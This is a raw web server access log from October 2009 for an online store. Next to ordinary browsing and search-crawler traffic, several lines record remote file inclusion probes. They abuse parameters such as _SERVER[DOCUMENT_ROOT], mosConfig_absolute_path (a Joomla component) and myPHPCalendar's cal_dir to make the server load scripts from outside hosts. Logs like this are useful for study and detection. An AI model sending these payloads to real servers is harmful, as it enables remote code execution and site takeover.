68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/items/9600050_THUMB.JPG HTTP/1.1" 200 2188 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:16 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
58.230.118.81 - - [22/Oct/2009:00:20:36 -0400] "GET /logs/access_log.Q109052300%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:20:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:20:37 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
58.230.118.81 - - [22/Oct/2009:00:20:43 -0400] "GET /logs/error_log.Q109092600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:20:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG HTTP/1.1" 200 67924 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C458109B10097F9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:46 -0400] "GET /images/items/0034196_THUMB.JPG HTTP/1.1" 200 2152 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:20:46 -0400] "GET /images/items/9600305_THUMB.JPG HTTP/1.1" 200 3031 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
66.249.71.152 - - [22/Oct/2009:00:20:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L3173FD4945596000096908L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.231.3.138 - - [22/Oct/2009:00:20:49 -0400] "GET /logs/access_log.Q109093000/?_SERVER[DOCUMENT_ROOT]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.231.3.138 - - [22/Oct/2009:00:20:49 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.231.3.138 - - [22/Oct/2009:00:20:49 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 200 22858 "-" "Mozilla/5.0"
68.34.121.240 - - [22/Oct/2009:00:20:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379D4E815941005209076+M37+ENG HTTP/1.1" 200 77716 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379D488769210014A9076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
110.45.147.248 - - [22/Oct/2009:00:21:19 -0400] "GET /logs/access_log.Q109082500%20%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:21:24 -0400] "GET /logs/access_log.Q109080500%20%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:21:29 -0400] "GET /logs/access_log.Q109082500%20%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
110.45.147.248 - - [22/Oct/2009:00:21:35 -0400] "GET /logs/access_log.Q109080500%20%20//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.6.8.113 - - [22/Oct/2009:00:21:38 -0400] "GET /logs/access_log.Q109060100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [22/Oct/2009:00:21:40 -0400] "GET /myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
206.225.23.4 - - [22/Oct/2009:00:21:40 -0400] "GET /logs/access_log.Q109091900/myPHPCalendar/admin.php?cal_dir=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
